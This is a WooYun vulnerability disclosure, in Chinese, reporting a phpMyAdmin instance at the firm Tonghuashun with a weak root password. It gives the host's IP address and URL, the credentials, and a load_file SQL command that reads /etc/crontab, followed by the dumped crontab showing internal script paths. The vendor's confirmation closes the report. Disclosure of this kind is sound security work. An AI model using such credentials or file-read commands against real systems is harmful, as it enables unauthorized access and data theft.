乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-28: 细节已通知厂商并且等待厂商处理中 2016-04-28: 厂商已经确认,细节仅向厂商公开 2016-05-08: 细节向核心白帽子及相关领域专家公开 2016-05-18: 细节向普通白帽子公开 2016-05-28: 细节向实习白帽子公开 2016-06-12: 细节向公众公开
同花顺某phpMyAdmin存在root弱口令
http://183.131.12.139:81/phpmyadmin/root123456/hxapp/hqserver/ 同花顺行情服务器的标志
select load_file('/etc/crontab');
SHELL=/bin/bashPATH=/sbin:/bin:/usr/sbin:/usr/binMAILTO=rootHOME=/# For details see man 4 crontabs# Example of job definition:# .---------------- minute (0 - 59)# | .------------- hour (0 - 23)# | | .---------- day of month (1 - 31)# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat# | | | | |# * * * * * user-name command to be executed*/5 * * * * root ntpdate ntp1.nl.net >/dev/null 2>&1*/3 8-16 * * 1-5 root sh /home/netstat/update_link_relation.sh > /dev/nul*/1 * * * * root sh /home/l2log/update_log.sh > /dev/nul*/1 8-16 * * 1-5 root sh /usr/local/nagios/var/processLog_cp.sh > /dev/nul00 17 * * * root sh /home/lossreport/loss_report.sh >/dev/null 2>&1##00 22 * * 1-5 root sh /home/arping/deal_arping_file.sh >/dev/null 2>&1*/1 * * * * root sh /home/netcheck/netcheck_log.sh >/dev/null 2>&1##*/1 8-15 * * 1-5 root sh /home/netinfo/fpinglog_check.sh > /dev/nul#* * * * * root flock -xn /usr/local/nagios/var/log_summary/log_summary.sh /usr/local/nagios/var/log_summary/log_summary.sh >> /tmp/a.txt 2>&1#00 23 * * * root sh /usr/local/nagios/var/log_summary/nagioslog_backup/nagioslog_backup.sh > /dev/null00 22 * * 1-5 root sh /home/switch_check/get_mac.sh > /dev/nul 25 17 * * 1-5 root sh /home/switch_check/get_mac.sh > /dev/nul 00 09 * * 1-5 root sh /home/switch_check/get_mac.sh > /dev/nul */5 22-23 * * 1-5 root sh /home/arping/arping.sh > /dev/nul#*/1 * * * 1-5 root sh /home/check_loss/check_loss.sh >/dev/null 2>&159 05 * * * root mv /usr/local/nagios/var/nagios.log /usr/local/nagios/var/log_summary/nagios.log.6am#*/1 * * * 1-5 root sh /home/add_realtime_task/add_realtime_task.sh >/dev/null 2>&1##59 23 * * 0-6 root sh /home/netcheck/netcheck_db_back.sh >/dev/null##59 23 * * 0-6 root sh /home/netcheck/netstat_db_back.sh >/dev/null#45 08 * * * root cp /usr/local/nagios/var/nagios.log /usr/local/nagios/var/log_summary/nagios.log.am8045##* * * * * root flock -xn /tmp/1.lock sh /tmp/1.sh#*/5 * * * * root flock -xn /home/nagios/CheckNagios/SendMail_PollerError.sh sh /home/nagios/CheckNagios/SendMail_PollerError.sh * * * * * root /usr/local/nagios/var/log_summary/poller_log_filter.sh*/5 * * * * root sh /home/nagios/CheckNagios/checkNagiosProcess.sh00 */2 * * * root sh /home/nagios/CheckNagios/checkDebugFile.sh*/5 * * * 1-5 root sh /home/realtime_check/update_realtime.sh >/dev/null 2>&1*/30 * * * * root sh /usr/local/nagios/libexec/check_poller_disk > /dev/null00 05 * * * root sh /hxapp/hqserver/bin/Sf_Disk.sh >/dev/null 2>&1
危害等级:中
漏洞Rank:5
确认时间:2016-04-28 15:35
你好,漏洞已经确认,正在进行处理,谢谢。
暂无